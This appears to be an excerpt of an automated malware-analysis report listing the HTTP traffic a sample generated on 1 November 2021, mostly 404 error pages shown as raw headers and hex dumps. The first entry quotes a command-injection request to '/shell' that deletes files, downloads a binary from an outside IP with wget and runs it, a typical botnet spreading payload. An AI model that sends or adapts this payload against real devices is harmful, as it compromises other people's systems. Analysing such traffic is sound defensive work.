2f 22 3e 74 68 74 74 70 64 2f 32 2e 32 35 62 20 32 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H2>404 Not Found</H2>The requested URL '/shell?cd+/tmp;rm+-rf+*;wget+49.12.233.52/jaws;sh+/tmp/jaws' was not found on this server.<HR><ADDRESS><A HREF="http://www.acme.com/software/thttpd/">thttpd/2.25b 29dec2003</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:18 GMTServer: ApacheAccept-Ranges: bytesKeep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:14:52 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 1725Content-Type: text/html; charset=utf-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:10:21 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service Unavailable: Back-end server is at capacityContent-Length: 0Connection: Close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.6.2Date: Mon, 01 Nov 2021 09:10:21 GMTContent-Type: text/htmlContent-Length: 168Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.6.2</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheServer: WebServerContent-Type: text/htmlContent-Length: 345Date: Mon, 01 Nov 2021 09:10:21 GMTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 14:40:21 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:05:39 GMTServer: Apache/2.4.6 (CentOS)Content-Length: 148Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-8Data Raw: 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 53 6f 72 72 79 21 3c 2f 68 31 3e 3c 6c 61 62 65 6c 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 64 61 72 6b 73 6c 61 74 65 67 72 65 79 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 63 75 72 73 69 76 65 3b 22 3e 4e 54 68 65 20 70 61 67 65 20 79 6f 75 20 77 65 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 2e 3c 2f 6c 61 62 65 6c 3e 3c 2f 63 65 6e 74 65 72 3e Data Ascii: <center><h1>Sorry!</h1><label style="color: darkslategrey;font-family: cursive;">NThe page you were looking for could not be found.</label></center>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:23 GMTServer: ApacheContent-Length: 255Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:10:24 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:24 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 42X-Varnish: 65793091X-Robots-Tag: noindex, nofollowServer: MIVia: 1.1 miMI-Cache-Age: 0Connection: keep-aliveData Raw: 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 2e Data Ascii: The requested resource could not be found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:24 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 1699Keep-Alive: timeout=5Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 32 38 32 65 36 3b 0a 20 20 74 65 78
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-Frame-Options: SAMEORIGINStatus: 404 Not FoundContent-Type: text/html; charset=UTF-8Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheTransfer-Encoding: chunkedCONTENT-LANGUAGE: enDate: Mon, 01 Nov 2021 09:10:24 GMTServer: lighttpd/1.4.39Data Raw: 30 66 30 66 0d 0a ef bb bf 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4c 69 6e 6b 73 79 73 20 53 6d 61 72 74 20 57 69 2d 46 69 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 21 2d 2d 62 69 67 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 21 2d 2d 42 45 47 49 4e 5f 43 4f 4d 42 49 4e 45 44 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 75 69 2f 31 2e 30 2e 39 39 2e 31 39 36 34 30 30 2f 73 74 61 74 69 63 2f 63 61 63 68 65 2f 63 73 73 2f 72 65 73 65 74 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 75 69 2f 31 2e 30 2e 39 39 2e 31 39 36 34 30 30 2f 73 74 61 74 69 63 2f 63 61 63 68 65 2f 63 73 73 2f 63 6f 6e 6e 65 63 74 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 75 69 2f 31 2e 30 2e 39 39 2e 31 39 36 34 30 30 2f 73 74 61 74 69 63 2f 63 61 63 68 65 2f 63 73 73 2f 61 70 70 6c 65 74 2d 75 69 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 75 69 2f 31 2e 30 2e 39 39 2e 31 39 36 34 30 30 2f 73 74 61 74 69 63 2f 63 61 63 68 65 2f 63 73 73 2f 76 61 6c 69 64 61 74 69 6f 6e 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 75 69 2f 31 2e 30 2e 39 39 2e 31 39 36 34 30 30 2f 73 74 61 74 69 63 2f 63 61 63 68 65 2f 63 73 73 2f 63 68 65 63 6b 62 6f 78 2d 72 61 64 69 6f 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:26 GMTServer: ApacheX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:10:26 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:27 GMTServer: ApacheContent-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
